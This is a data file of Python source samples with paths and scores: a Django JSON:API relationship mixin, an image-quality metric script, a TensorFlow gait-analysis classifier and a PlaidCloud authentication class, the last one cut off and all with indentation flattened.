self.perform_relationship_destroy(rel, data)
return Response(status=status.HTTP_204_NO_CONTENT)
@transaction.atomic
def perform_relationship_create(self, rel, data):
instance = self.get_object()
related = self.get_related_from_data(rel, data)
self.link_related(rel, instance, related)
@transaction.atomic
def perform_relationship_update(self, rel, data):
instance = self.get_object()
related = self.get_related_from_data(rel, data)
self.set_related(rel, instance, related)
# Only to-one relationships need to be saved
if not rel.info.to_many:
if rel.attname in self.model_info.reverse_relations:
related.save()
else:
instance.save()
@transaction.atomic
def perform_relationship_destroy(self, rel, data):
instance = self.get_object()
related = self.get_related_from_data(rel, data)
self.unlink_related(rel, instance, related) | json_api/mixins/relationships.py | from django.db import transaction
from rest_framework import status
from rest_framework.response import Response
from json_api.exceptions import MethodNotAllowed
class RetrieveRelationshipMixin(object):
def retrieve_relationship(self, request, pk, relname, *args, **kwargs):
rel = self.get_relationship(relname)
instance = self.get_object()
response_data = self.build_relationship_object(rel, instance, include_linkage=True)
return Response(response_data)
class ManageRelationshipMixin(object):
def create_relationship(self, request, pk, relname, *args, **kwargs):
rel = self.get_relationship(relname)
if not rel.info.to_many:
raise MethodNotAllowed(request.method)
data = self.get_data(request.data)
self.perform_relationship_create(rel, data)
return Response(status=status.HTTP_204_NO_CONTENT)
def update_relationship(self, request, pk, relname, *args, **kwargs):
rel = self.get_relationship(relname)
data = self.get_data(request.data)
self.perform_relationship_update(rel, data)
return Response(status=status.HTTP_204_NO_CONTENT)
def destroy_relationship(self, request, pk, relname, *args, **kwargs):
rel = self.get_relationship(relname)
if not rel.info.to_many:
raise MethodNotAllowed(request.method)
data = self.get_data(request.data)
self.perform_relationship_destroy(rel, data)
return Response(status=status.HTTP_204_NO_CONTENT)
@transaction.atomic
def perform_relationship_create(self, rel, data):
instance = self.get_object()
related = self.get_related_from_data(rel, data)
self.link_related(rel, instance, related)
@transaction.atomic
def perform_relationship_update(self, rel, data):
instance = self.get_object()
related = self.get_related_from_data(rel, data)
self.set_related(rel, instance, related)
# Only to-one relationships need to be saved
if not rel.info.to_many:
if rel.attname in self.model_info.reverse_relations:
related.save()
else:
instance.save()
@transaction.atomic
def perform_relationship_destroy(self, rel, data):
instance = self.get_object()
related = self.get_related_from_data(rel, data)
self.unlink_related(rel, instance, related) | 0.588416 | 0.089097 |
import gpu_util
import os
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_util.pick_gpu_lowest_memory())
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot
import sys
import skimage.measure
import numpy
import numpy as np
import skimage.io
from skimage.morphology import disk, dilation
import skimage.feature
import skimage.metrics
def compute_metric(dir1, dir2, mode, mask=None, thre=0):
if mode == 'perceptual_tf':
sys.path += ['lpips-tensorflow']
import lpips_tf
import tensorflow as tf
image0_ph = tf.placeholder(tf.float32, [1, None, None, 3])
image1_ph = tf.placeholder(tf.float32, [1, None, None, 3])
distance_t = lpips_tf.lpips(image0_ph, image1_ph, model='net-lin', net='alex')
sess = tf.Session()
files1 = os.listdir(dir1)
files2 = os.listdir(dir2)
img_files1 = sorted([file for file in files1 if file.endswith('.png') or file.endswith('.jpg')])
img_files2 = sorted([file for file in files2 if file.endswith('.png') or file.endswith('.jpg')])
if '--prefix' in sys.argv:
prefix_idx = sys.argv.index('--prefix')
prefix = sys.argv[prefix_idx+1]
img_files2 = [file for file in img_files2 if file.startswith(prefix)]
skip_last_n = 0
img_files2 = img_files2
assert len(img_files1) == len(img_files2)
vals = numpy.empty(len(img_files1))
for ind in range(len(img_files1)):
if mode in ['ssim', 'psnr']:
img1 = skimage.img_as_float(skimage.io.imread(os.path.join(dir1, img_files1[ind])))
img2 = skimage.img_as_float(skimage.io.imread(os.path.join(dir2, img_files2[ind])))
if mode == 'ssim':
metric_val = skimage.measure.compare_ssim(img1, img2, datarange=img2.max()-img2.min(), multichannel=True)
elif mode == 'psnr':
metric_val = skimage.metrics.peak_signal_noise_ratio(img2, img1)
elif mode == 'perceptual_tf':
img1 = np.expand_dims(skimage.img_as_float(skimage.io.imread(os.path.join(dir1, img_files1[ind]))), axis=0)
img2 = np.expand_dims(skimage.img_as_float(skimage.io.imread(os.path.join(dir2, img_files2[ind]))), axis=0)
metric_val = sess.run(distance_t, feed_dict={image0_ph: img1, image1_ph: img2})
else:
raise
vals[ind] = numpy.mean(metric_val)
filename_all = mode + '_all.txt'
filename_breakdown = mode + '_breakdown.txt'
filename_single = mode + '.txt'
numpy.savetxt(os.path.join(dir1, filename_all), vals, fmt="%f, ")
target=open(os.path.join(dir1, filename_single),'w')
target.write("%f"%numpy.mean(vals))
target.close()
if len(img_files1) == 30:
target=open(os.path.join(dir1, filename_breakdown),'w')
target.write("%f, %f, %f"%(numpy.mean(vals[:5]), numpy.mean(vals[5:10]), numpy.mean(vals[10:])))
target.close()
if mode == 'perceptual_tf':
sess.close()
return vals
def get_score(name):
dirs = sorted(os.listdir(name))
if len(sys.argv) > 3:
mode = sys.argv[3]
if mode == 'all':
mode = None
else:
mode = None
all_modes = ['ssim', 'perceptual_tf', 'psnr']
if mode is None:
print('running all mode', mode)
for m in all_modes:
compute_metric(name, sys.argv[2], m)
else:
assert mode in all_modes
print('running mode', mode)
compute_metric(name, sys.argv[2], mode)
if __name__ == '__main__':
get_score(sys.argv[1]) | metric_evaluation.py | import gpu_util
import os
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_util.pick_gpu_lowest_memory())
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot
import sys
import skimage.measure
import numpy
import numpy as np
import skimage.io
from skimage.morphology import disk, dilation
import skimage.feature
import skimage.metrics
def compute_metric(dir1, dir2, mode, mask=None, thre=0):
if mode == 'perceptual_tf':
sys.path += ['lpips-tensorflow']
import lpips_tf
import tensorflow as tf
image0_ph = tf.placeholder(tf.float32, [1, None, None, 3])
image1_ph = tf.placeholder(tf.float32, [1, None, None, 3])
distance_t = lpips_tf.lpips(image0_ph, image1_ph, model='net-lin', net='alex')
sess = tf.Session()
files1 = os.listdir(dir1)
files2 = os.listdir(dir2)
img_files1 = sorted([file for file in files1 if file.endswith('.png') or file.endswith('.jpg')])
img_files2 = sorted([file for file in files2 if file.endswith('.png') or file.endswith('.jpg')])
if '--prefix' in sys.argv:
prefix_idx = sys.argv.index('--prefix')
prefix = sys.argv[prefix_idx+1]
img_files2 = [file for file in img_files2 if file.startswith(prefix)]
skip_last_n = 0
img_files2 = img_files2
assert len(img_files1) == len(img_files2)
vals = numpy.empty(len(img_files1))
for ind in range(len(img_files1)):
if mode in ['ssim', 'psnr']:
img1 = skimage.img_as_float(skimage.io.imread(os.path.join(dir1, img_files1[ind])))
img2 = skimage.img_as_float(skimage.io.imread(os.path.join(dir2, img_files2[ind])))
if mode == 'ssim':
metric_val = skimage.measure.compare_ssim(img1, img2, datarange=img2.max()-img2.min(), multichannel=True)
elif mode == 'psnr':
metric_val = skimage.metrics.peak_signal_noise_ratio(img2, img1)
elif mode == 'perceptual_tf':
img1 = np.expand_dims(skimage.img_as_float(skimage.io.imread(os.path.join(dir1, img_files1[ind]))), axis=0)
img2 = np.expand_dims(skimage.img_as_float(skimage.io.imread(os.path.join(dir2, img_files2[ind]))), axis=0)
metric_val = sess.run(distance_t, feed_dict={image0_ph: img1, image1_ph: img2})
else:
raise
vals[ind] = numpy.mean(metric_val)
filename_all = mode + '_all.txt'
filename_breakdown = mode + '_breakdown.txt'
filename_single = mode + '.txt'
numpy.savetxt(os.path.join(dir1, filename_all), vals, fmt="%f, ")
target=open(os.path.join(dir1, filename_single),'w')
target.write("%f"%numpy.mean(vals))
target.close()
if len(img_files1) == 30:
target=open(os.path.join(dir1, filename_breakdown),'w')
target.write("%f, %f, %f"%(numpy.mean(vals[:5]), numpy.mean(vals[5:10]), numpy.mean(vals[10:])))
target.close()
if mode == 'perceptual_tf':
sess.close()
return vals
def get_score(name):
dirs = sorted(os.listdir(name))
if len(sys.argv) > 3:
mode = sys.argv[3]
if mode == 'all':
mode = None
else:
mode = None
all_modes = ['ssim', 'perceptual_tf', 'psnr']
if mode is None:
print('running all mode', mode)
for m in all_modes:
compute_metric(name, sys.argv[2], m)
else:
assert mode in all_modes
print('running mode', mode)
compute_metric(name, sys.argv[2], mode)
if __name__ == '__main__':
get_score(sys.argv[1]) | 0.201577 | 0.288663 |
import numpy as np
import tensorflow as tf
import bidirectional_autoencoder as bd
import data_utils as du
# 5719 total samples
# 5147 training samples
# 321 batches of size 16
# 10 epochs more or less
#STEPS = 3250
STEPS = 10000
#batch_size = bd.batch_size
starting_learning_rate = 1e-2
decay_rate = 5e-1
decay_steps = 1000
"""
Build the data iterators for training and testing.
For more information about data iterators and tf input
pipelines, please refer to the official tf documentation
(https://www.tensorflow.org/versions/r0.12/api_docs/python/io_ops/input_pipeline)
"""
def build_iterators():
#split 90% train, 10% test
dataset = np.load(du.classifier_ds_fname)
labels = np.load(du.classifier_l_fname)
train_data = dataset[:int(len(dataset)*0.9)]
train_labels = labels[:int(len(labels)*0.9)]
test_data = dataset[int(len(dataset)*0.9):]
test_labels = labels[int(len(labels)*0.9):]
train_dataset = tf.data.Dataset.from_tensor_slices(tf.cast(train_data,
dtype = tf.float32))
test_dataset = tf.data.Dataset.from_tensor_slices(tf.cast(test_data,
dtype = tf.float32))
train_target = tf.data.Dataset.from_tensor_slices(tf.cast(train_labels,
dtype = tf.int32))
test_target = tf.data.Dataset.from_tensor_slices(tf.cast(test_labels,
dtype = tf.int32))
train_dataset = train_dataset.batch(bd.batch_size)
train_target = train_target.batch(bd.batch_size)
# I batch the test just for convenience, otherwise I should
# define the batch_size as a placeholder
# and change it accordong the whether I'm in training or
# testing
test_dataset = test_dataset.batch(len(test_data))
test_target = test_target.batch(len(test_data))
train_data_iterator = train_dataset.make_initializable_iterator()
train_target_iterator = train_target.make_initializable_iterator()
test_data_iterator = test_dataset.make_initializable_iterator()
test_target_iterator = test_target.make_initializable_iterator()
return (train_data_iterator,
train_target_iterator,
test_data_iterator,
test_target_iterator)
"""
The final state of the autoencoder must be unpacked and reshaped.
Here we do this.
"""
def reshape_state(state, num_units, batch_size):
log_dimension = np.log2(num_units)
h = int(2**(np.floor(log_dimension/2)+1))
w = int(2**np.floor(log_dimension/2))
# Ugly as fuck unpacking of the output state
# of the bidirectional LSTM blocks
# After these operations s_[f|b]w_i_j has shape
# (batch_size, num_units)
s_fw, s_bw = tf.unstack(state)
s_fw_1, s_fw_2 = tf.unstack(s_fw)
s_fw_1_1, s_fw_1_2 = tf.unstack(s_fw_1)
s_fw_2_1, s_fw_2_2 = tf.unstack(s_fw_2)
s_bw_1, s_bw_2 = tf.unstack(s_bw)
s_bw_1_1, s_bw_1_2 = tf.unstack(s_bw_1)
s_bw_2_1, s_bw_2_2 = tf.unstack(s_bw_2)
state_list = [s_fw_1_1,
s_fw_1_2,
s_fw_2_1,
s_fw_2_2,
s_bw_1_1,
s_bw_1_2,
s_bw_2_1,
s_bw_2_2]
# Now it is time to repack the tensors in a
# (batch_size, height, width, depth) shape
# Namely, (16, 32, 16, 8)
reshaped_state_list = [tf.reshape(x, [batch_size,h,w,1])
for x in state_list]
s_full = tf.stack(reshaped_state_list,3)
s_full = tf.squeeze(s_full, 4)
#s_full = tf.reshape(s_full, [batch_size, h, w, 8])
return s_full
"""
Here the convolutional architecture is defined.
The filters must be a tf variable. We initialize their weights by means
of truncated normal distribution with 0 mean and standard deviation std=5e-2.
We have one convolutional layer with [10, 6, 8, 16] filters, and a max pooling
operation with kernel size ksize = [1, 4, 4, 1], and strides = [1, 2, 2, 1]
"""
def build_conv_layers(in_tensor):
filters = tf.get_variable('filter',
[10, 6, 8, 16],
initializer=tf.truncated_normal_initializer(stddev=5e-2, dtype=tf.float32),
dtype=tf.float32)
x_1 = tf.nn.conv2d(input = in_tensor,
filter = filters,
strides = [1, 2, 2, 1],
padding = 'SAME',
name = 'cv_1')
pool_1 = tf.nn.max_pool(value = x_1,
ksize = [1, 4, 4, 1],
strides = [1, 2, 2, 1],
padding = 'SAME',
name = 'pool_1')
return pool_1
"""
Add a RELU activation function
"""
def add_relu_activation(in_tensor):
return tf.nn.relu(features = in_tensor, name = 'relu')
"""
Flatten the output
"""
def add_dropout(in_tensor, keep_prob):
return tf.nn.dropout(x = in_tensor,
keep_prob = keep_prob,
name = 'conv_dropout')
def flatten_layer(in_tensor):
# This layer flattens in_tensor so that it can be
# fed to the output layer.
# in_tensor must have shape [batch_size, whatever]
flat_output = tf.contrib.layers.flatten(in_tensor)
return flat_output
"""
Run this to train the classifier. The trained model will be saved in
"./checkpoint/classification/model"
"""
def build_output_layer(in_tensor):
logits = tf.layers.dense(inputs = in_tensor,
units = 2,
activation = None,
name = 'logits')
return logits
def build_loss(in_tensor, labels):
loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels = labels,
logits = in_tensor,
name = 'xent'))
return loss
def training_step(loss, global_step):
learning_rate = tf.train.exponential_decay(starting_learning_rate,
global_step = global_step,
decay_steps = decay_steps,
decay_rate = decay_rate,
staircase=True)
opt = tf.train.GradientDescentOptimizer(learning_rate)
opt_op = opt.minimize(loss)
return opt_op
"""
Run this to train the classifier. The trained model will be saved in
"./checkpoint/classification/model"
"""
if __name__ == '__main__':
conv_train_graph = tf.Graph()
data = np.load(du.np_data_fname)
data = data[:int(len(data)*0.9)]
with conv_train_graph.as_default():
data_handle = tf.placeholder(tf.string, shape = [], name = 'data_handle')
target_handle = tf.placeholder(tf.string, shape = [], name = 'labels_handle')
data_iterator = tf.data.Iterator.from_string_handle(data_handle,
output_types = tf.float32,
output_shapes = [None, du.STEPS, du.FEATURES])
target_iterator = tf.data.Iterator.from_string_handle(target_handle,
output_types = tf.int32,
output_shapes = [None, 2])
train_data_iterator, train_target_iterator, \
test_data_iterator, test_target_iterator = build_iterators()
sequence = data_iterator.get_next()
labels = target_iterator.get_next()
keep_prob = tf.placeholder_with_default(1.0, shape=(),
name = 'keep_prob_ph')
fw_cell = bd.build_fw_cell(keep_prob = keep_prob)
bw_cell = bd.build_bw_cell(keep_prob = keep_prob)
output, state = bd.build_rnn_autoencoder(
fw_cell = fw_cell,
bw_cell = bw_cell,
input_sequence = sequence,
sequence_lengths = du.STEPS)
# concatenate output_fw and output_bw
output = tf.concat(output, 2)
# Here I obtain the predictions from the autoencoder
predictions = bd.build_output_layer(source = output,
output_dim = 9)
# Reshape the final state of the autoencoder so that
# shape is: [batch_size, height, width, channels]
batch_size = tf.placeholder_with_default(bd.batch_size,
shape=(), name = 'batch_size')
s_full = reshape_state(state, bd.num_units, batch_size)
restore_rnn = tf.train.Saver()
conv_keep_prob = tf.placeholder(shape = (), dtype = tf.float32,
name = 'kp_conv_ph')
global_step = tf.Variable(0, trainable=False)
pooling_output = build_conv_layers(s_full)
relu = add_relu_activation(pooling_output)
flat_output = flatten_layer(relu)
do_output = add_dropout(flat_output, conv_keep_prob)
logits = build_output_layer(do_output)
loss = build_loss(logits, labels)
update_step = training_step(loss, global_step)
tf.summary.scalar('loss', loss)
init = tf.global_variables_initializer()
merged_summary = tf.summary.merge_all()
train_saver = tf.train.Saver()
sess = tf.Session(graph = conv_train_graph)
sess.run(init)
train_data_handle, train_target_handle = sess.run([
train_data_iterator.string_handle(),
train_target_iterator.string_handle()])
test_data_handle, test_target_handle = sess.run([
test_data_iterator.string_handle(),
test_target_iterator.string_handle()])
sess.run([train_data_iterator.initializer,
train_target_iterator.initializer,
test_data_iterator.initializer,
test_target_iterator.initializer])
restore_rnn.restore(sess, './checkpoint/model')
writer_1 = tf.summary.FileWriter('./checkpoint/classification/train/', conv_train_graph)
writer_2 = tf.summary.FileWriter('./checkpoint/classification/eval/', conv_train_graph)
for train_step in range(STEPS):
if train_step%320!=0 or train_step==0:
s, l, _ = sess.run([merged_summary, loss, update_step],
feed_dict = {data_handle: train_data_handle,
target_handle: train_target_handle, conv_keep_prob: 0.5})
else:
sess.run(train_data_iterator.initializer)
sess.run(train_target_iterator.initializer)
s, l, _ = sess.run([merged_summary, loss, update_step],
feed_dict = {data_handle: train_data_handle,
target_handle: train_target_handle, conv_keep_prob: 0.5})
if train_step%100 == 0:
writer_1.add_summary(s, train_step)
print('Step -> %d\tLoss -> %f' % (train_step, l))
sess.run([test_data_iterator.initializer,
test_target_iterator.initializer])
s, eval_loss = sess.run([merged_summary, loss],
feed_dict = {data_handle: test_data_handle,
target_handle: test_target_handle,
batch_size: 572,
conv_keep_prob: 1.0})
writer_2.add_summary(s, train_step)
print('Eval Loss -> %f' % eval_loss)
if train_step%500==0:
train_saver.save(sess,
'./checkpoint/classification/model',
global_step = train_step+1)
train_saver.save(sess,
'./checkpoint/classification/model')
writer_1.close()
writer_2.close() | Seq2Seq-gait-analysis/conv_classifier_eval.py | import numpy as np
import tensorflow as tf
import bidirectional_autoencoder as bd
import data_utils as du
# 5719 total samples
# 5147 training samples
# 321 batches of size 16
# 10 epochs more or less
#STEPS = 3250
STEPS = 10000
#batch_size = bd.batch_size
starting_learning_rate = 1e-2
decay_rate = 5e-1
decay_steps = 1000
"""
Build the data iterators for training and testing.
For more information about data iterators and tf input
pipelines, please refer to the official tf documentation
(https://www.tensorflow.org/versions/r0.12/api_docs/python/io_ops/input_pipeline)
"""
def build_iterators():
#split 90% train, 10% test
dataset = np.load(du.classifier_ds_fname)
labels = np.load(du.classifier_l_fname)
train_data = dataset[:int(len(dataset)*0.9)]
train_labels = labels[:int(len(labels)*0.9)]
test_data = dataset[int(len(dataset)*0.9):]
test_labels = labels[int(len(labels)*0.9):]
train_dataset = tf.data.Dataset.from_tensor_slices(tf.cast(train_data,
dtype = tf.float32))
test_dataset = tf.data.Dataset.from_tensor_slices(tf.cast(test_data,
dtype = tf.float32))
train_target = tf.data.Dataset.from_tensor_slices(tf.cast(train_labels,
dtype = tf.int32))
test_target = tf.data.Dataset.from_tensor_slices(tf.cast(test_labels,
dtype = tf.int32))
train_dataset = train_dataset.batch(bd.batch_size)
train_target = train_target.batch(bd.batch_size)
# I batch the test just for convenience, otherwise I should
# define the batch_size as a placeholder
# and change it accordong the whether I'm in training or
# testing
test_dataset = test_dataset.batch(len(test_data))
test_target = test_target.batch(len(test_data))
train_data_iterator = train_dataset.make_initializable_iterator()
train_target_iterator = train_target.make_initializable_iterator()
test_data_iterator = test_dataset.make_initializable_iterator()
test_target_iterator = test_target.make_initializable_iterator()
return (train_data_iterator,
train_target_iterator,
test_data_iterator,
test_target_iterator)
"""
The final state of the autoencoder must be unpacked and reshaped.
Here we do this.
"""
def reshape_state(state, num_units, batch_size):
log_dimension = np.log2(num_units)
h = int(2**(np.floor(log_dimension/2)+1))
w = int(2**np.floor(log_dimension/2))
# Ugly as fuck unpacking of the output state
# of the bidirectional LSTM blocks
# After these operations s_[f|b]w_i_j has shape
# (batch_size, num_units)
s_fw, s_bw = tf.unstack(state)
s_fw_1, s_fw_2 = tf.unstack(s_fw)
s_fw_1_1, s_fw_1_2 = tf.unstack(s_fw_1)
s_fw_2_1, s_fw_2_2 = tf.unstack(s_fw_2)
s_bw_1, s_bw_2 = tf.unstack(s_bw)
s_bw_1_1, s_bw_1_2 = tf.unstack(s_bw_1)
s_bw_2_1, s_bw_2_2 = tf.unstack(s_bw_2)
state_list = [s_fw_1_1,
s_fw_1_2,
s_fw_2_1,
s_fw_2_2,
s_bw_1_1,
s_bw_1_2,
s_bw_2_1,
s_bw_2_2]
# Now it is time to repack the tensors in a
# (batch_size, height, width, depth) shape
# Namely, (16, 32, 16, 8)
reshaped_state_list = [tf.reshape(x, [batch_size,h,w,1])
for x in state_list]
s_full = tf.stack(reshaped_state_list,3)
s_full = tf.squeeze(s_full, 4)
#s_full = tf.reshape(s_full, [batch_size, h, w, 8])
return s_full
"""
Here the convolutional architecture is defined.
The filters must be a tf variable. We initialize their weights by means
of truncated normal distribution with 0 mean and standard deviation std=5e-2.
We have one convolutional layer with [10, 6, 8, 16] filters, and a max pooling
operation with kernel size ksize = [1, 4, 4, 1], and strides = [1, 2, 2, 1]
"""
def build_conv_layers(in_tensor):
filters = tf.get_variable('filter',
[10, 6, 8, 16],
initializer=tf.truncated_normal_initializer(stddev=5e-2, dtype=tf.float32),
dtype=tf.float32)
x_1 = tf.nn.conv2d(input = in_tensor,
filter = filters,
strides = [1, 2, 2, 1],
padding = 'SAME',
name = 'cv_1')
pool_1 = tf.nn.max_pool(value = x_1,
ksize = [1, 4, 4, 1],
strides = [1, 2, 2, 1],
padding = 'SAME',
name = 'pool_1')
return pool_1
"""
Add a RELU activation function
"""
def add_relu_activation(in_tensor):
return tf.nn.relu(features = in_tensor, name = 'relu')
"""
Flatten the output
"""
def add_dropout(in_tensor, keep_prob):
return tf.nn.dropout(x = in_tensor,
keep_prob = keep_prob,
name = 'conv_dropout')
def flatten_layer(in_tensor):
# This layer flattens in_tensor so that it can be
# fed to the output layer.
# in_tensor must have shape [batch_size, whatever]
flat_output = tf.contrib.layers.flatten(in_tensor)
return flat_output
"""
Run this to train the classifier. The trained model will be saved in
"./checkpoint/classification/model"
"""
def build_output_layer(in_tensor):
logits = tf.layers.dense(inputs = in_tensor,
units = 2,
activation = None,
name = 'logits')
return logits
def build_loss(in_tensor, labels):
loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels = labels,
logits = in_tensor,
name = 'xent'))
return loss
def training_step(loss, global_step):
learning_rate = tf.train.exponential_decay(starting_learning_rate,
global_step = global_step,
decay_steps = decay_steps,
decay_rate = decay_rate,
staircase=True)
opt = tf.train.GradientDescentOptimizer(learning_rate)
opt_op = opt.minimize(loss)
return opt_op
"""
Run this to train the classifier. The trained model will be saved in
"./checkpoint/classification/model"
"""
if __name__ == '__main__':
conv_train_graph = tf.Graph()
data = np.load(du.np_data_fname)
data = data[:int(len(data)*0.9)]
with conv_train_graph.as_default():
data_handle = tf.placeholder(tf.string, shape = [], name = 'data_handle')
target_handle = tf.placeholder(tf.string, shape = [], name = 'labels_handle')
data_iterator = tf.data.Iterator.from_string_handle(data_handle,
output_types = tf.float32,
output_shapes = [None, du.STEPS, du.FEATURES])
target_iterator = tf.data.Iterator.from_string_handle(target_handle,
output_types = tf.int32,
output_shapes = [None, 2])
train_data_iterator, train_target_iterator, \
test_data_iterator, test_target_iterator = build_iterators()
sequence = data_iterator.get_next()
labels = target_iterator.get_next()
keep_prob = tf.placeholder_with_default(1.0, shape=(),
name = 'keep_prob_ph')
fw_cell = bd.build_fw_cell(keep_prob = keep_prob)
bw_cell = bd.build_bw_cell(keep_prob = keep_prob)
output, state = bd.build_rnn_autoencoder(
fw_cell = fw_cell,
bw_cell = bw_cell,
input_sequence = sequence,
sequence_lengths = du.STEPS)
# concatenate output_fw and output_bw
output = tf.concat(output, 2)
# Here I obtain the predictions from the autoencoder
predictions = bd.build_output_layer(source = output,
output_dim = 9)
# Reshape the final state of the autoencoder so that
# shape is: [batch_size, height, width, channels]
batch_size = tf.placeholder_with_default(bd.batch_size,
shape=(), name = 'batch_size')
s_full = reshape_state(state, bd.num_units, batch_size)
restore_rnn = tf.train.Saver()
conv_keep_prob = tf.placeholder(shape = (), dtype = tf.float32,
name = 'kp_conv_ph')
global_step = tf.Variable(0, trainable=False)
pooling_output = build_conv_layers(s_full)
relu = add_relu_activation(pooling_output)
flat_output = flatten_layer(relu)
do_output = add_dropout(flat_output, conv_keep_prob)
logits = build_output_layer(do_output)
loss = build_loss(logits, labels)
update_step = training_step(loss, global_step)
tf.summary.scalar('loss', loss)
init = tf.global_variables_initializer()
merged_summary = tf.summary.merge_all()
train_saver = tf.train.Saver()
sess = tf.Session(graph = conv_train_graph)
sess.run(init)
train_data_handle, train_target_handle = sess.run([
train_data_iterator.string_handle(),
train_target_iterator.string_handle()])
test_data_handle, test_target_handle = sess.run([
test_data_iterator.string_handle(),
test_target_iterator.string_handle()])
sess.run([train_data_iterator.initializer,
train_target_iterator.initializer,
test_data_iterator.initializer,
test_target_iterator.initializer])
restore_rnn.restore(sess, './checkpoint/model')
writer_1 = tf.summary.FileWriter('./checkpoint/classification/train/', conv_train_graph)
writer_2 = tf.summary.FileWriter('./checkpoint/classification/eval/', conv_train_graph)
for train_step in range(STEPS):
if train_step%320!=0 or train_step==0:
s, l, _ = sess.run([merged_summary, loss, update_step],
feed_dict = {data_handle: train_data_handle,
target_handle: train_target_handle, conv_keep_prob: 0.5})
else:
sess.run(train_data_iterator.initializer)
sess.run(train_target_iterator.initializer)
s, l, _ = sess.run([merged_summary, loss, update_step],
feed_dict = {data_handle: train_data_handle,
target_handle: train_target_handle, conv_keep_prob: 0.5})
if train_step%100 == 0:
writer_1.add_summary(s, train_step)
print('Step -> %d\tLoss -> %f' % (train_step, l))
sess.run([test_data_iterator.initializer,
test_target_iterator.initializer])
s, eval_loss = sess.run([merged_summary, loss],
feed_dict = {data_handle: test_data_handle,
target_handle: test_target_handle,
batch_size: 572,
conv_keep_prob: 1.0})
writer_2.add_summary(s, train_step)
print('Eval Loss -> %f' % eval_loss)
if train_step%500==0:
train_saver.save(sess,
'./checkpoint/classification/model',
global_step = train_step+1)
train_saver.save(sess,
'./checkpoint/classification/model')
writer_1.close()
writer_2.close() | 0.601711 | 0.517937 |
from __future__ import absolute_import
from plaidcloud.rpc import utc
from six import text_type
__author__ = '<NAME>'
__maintainer__ = '<NAME> <<EMAIL>>'
__copyright__ = '© Copyright 2017, Tartan Solutions, Inc'
__license__ = 'Apache 2.0'
def user_auth(*args, **kwargs):
auth = Auth()
auth.user(*args, **kwargs)
return auth
def agent_auth(*args, **kwargs):
auth = Auth()
auth.agent(*args, **kwargs)
return auth
def transform_auth(*args, **kwargs):
auth = Auth()
auth.transform(*args, **kwargs)
return auth
def oauth2_auth(*args, **kwargs):
auth = Auth()
auth.oauth2(*args, **kwargs)
return auth
class Auth(object):
def __init__(self):
"""Initializes Auth object settings"""
self.status_message = ''
# Private variables
self._status_message = None
self._auth_status = None
self._auth_method = None
self._private_key = None
self._public_key = None
self._mfa = None
self._attempts = 0
def user(self, user_name, password, multi_factor=None):
"""Used for User based connections requiring login credentials"""
self.set_method(u'user')
self._set_public_key(user_name)
self._set_private_key(password)
self._set_multi_factor(multi_factor)
def agent(self, public_key, private_key, auth_method=u'agent'):
"""Used for PlaidLink agent based connections requireing the key information in PlaidCloud"""
self.set_method(auth_method)
self._set_public_key(public_key)
self._set_private_key(private_key)
def transform(self, task_id, session_id):
"""Transform based connection requiring the transform task_id and session_id"""
self.set_method(u'transform')
self._set_public_key(task_id)
self._set_private_key(session_id)
def oauth2(self, token):
"""oAuth2 based authentication connection"""
self.set_method(u'oauth2')
self._set_public_key(token)
def is_ok(self):
return self._auth_status == u'ok'
def get_status_message(self):
return self._status_message
def get_attempts(self):
return int(self._attempts)
def get_method(self):
return self._auth_method
def get_auth_status(self):
return self._auth_status
def set_status_message(self, value):
self._status_message = text_type(value)
def set_method(self, value):
if value in (u'user', u'agent', u'transform', u'oauth2'):
self._auth_method = value
else:
raise Exception("Invalid Authentication Method Specified")
def set_status(self, value):
if value in (u'setup', u'ready', u'ok', u'fail'):
self.status = value
else:
raise Exception("Invalid Authentication Status Specified")
def _set_private_key(self, value):
self._private_key = text_type(value)
def _set_public_key(self, value):
self._public_key = text_type(value)
def _set_multi_factor(self, value):
self._mfa = value
def _get_private_key(self):
return self._private_key
def _get_public_key(self):
return self._public_key
def _get_mfa(self):
return self._mfa
def _increment_attempts(self):
self._attempts += 1
def get_package(self):
package = {
'PlaidCloud-Auth-Method': str(self.get_method()),
'PlaidCloud-Key': str(self._get_public_key()),
'PlaidCloud-Pass': str(self._get_private_key()),
'PlaidCloud-MFA': str(self._get_mfa()),
'PlaidCloud-Timestamp': str(utc.timestamp())
}
self._increment_attempts()
return package | plaidcloud/rpc/remote/auth.py |
from __future__ import absolute_import
from plaidcloud.rpc import utc
from six import text_type
__author__ = '<NAME>'
__maintainer__ = '<NAME> <<EMAIL>>'
__copyright__ = '© Copyright 2017, Tartan Solutions, Inc'
__license__ = 'Apache 2.0'
def user_auth(*args, **kwargs):
auth = Auth()
auth.user(*args, **kwargs)
return auth
def agent_auth(*args, **kwargs):
auth = Auth()
auth.agent(*args, **kwargs)
return auth
def transform_auth(*args, **kwargs):
auth = Auth()
auth.transform(*args, **kwargs)
return auth
def oauth2_auth(*args, **kwargs):
auth = Auth()
auth.oauth2(*args, **kwargs)
return auth
class Auth(object):
def __init__(self):
"""Initializes Auth object settings"""
self.status_message = ''
# Private variables
self._status_message = None
self._auth_status = None
self._auth_method = None
self._private_key = None
self._public_key = None
self._mfa = None
self._attempts = 0
def user(self, user_name, password, multi_factor=None):
"""Used for User based connections requiring login credentials"""
self.set_method(u'user')
self._set_public_key(user_name)
self._set_private_key(password)
self._set_multi_factor(multi_factor)
def agent(self, public_key, private_key, auth_method=u'agent'):
"""Used for PlaidLink agent based connections requireing the key information in PlaidCloud"""
self.set_method(auth_method)
self._set_public_key(public_key)
self._set_private_key(private_key)
def transform(self, task_id, session_id):
"""Transform based connection requiring the transform task_id and session_id"""
self.set_method(u'transform')
self._set_public_key(task_id)
self._set_private_key(session_id)
def oauth2(self, token):
"""oAuth2 based authentication connection"""
self.set_method(u'oauth2')
self._set_public_key(token)
def is_ok(self):
return self._auth_status == u'ok'
def get_status_message(self):
return self._status_message
def get_attempts(self):
return int(self._attempts)
def get_method(self):
return self._auth_method
def get_auth_status(self):
return self._auth_status
def set_status_message(self, value):
self._status_message = text_type(value)
def set_method(self, value):
if value in (u'user', u'agent', u'transform', u'oauth2'):
self._auth_method = value
else:
raise Exception("Invalid Authentication Method Specified")
def set_status(self, value):
if value in (u'setup', u'ready', u'ok', u'fail'):
self.status = value
else:
raise Exception("Invalid Authentication Status Specified")
def _set_private_key(self, value):
self._private_key = text_type(value)
